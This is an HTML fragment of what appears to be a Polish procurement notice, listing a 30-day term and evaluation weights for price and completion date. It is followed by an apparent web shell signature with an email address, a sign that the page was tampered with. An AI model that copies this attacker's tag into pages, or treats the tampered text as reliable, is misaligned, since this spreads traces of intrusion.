<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.90</li>
<li>2. Termin realizacji - 0.10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com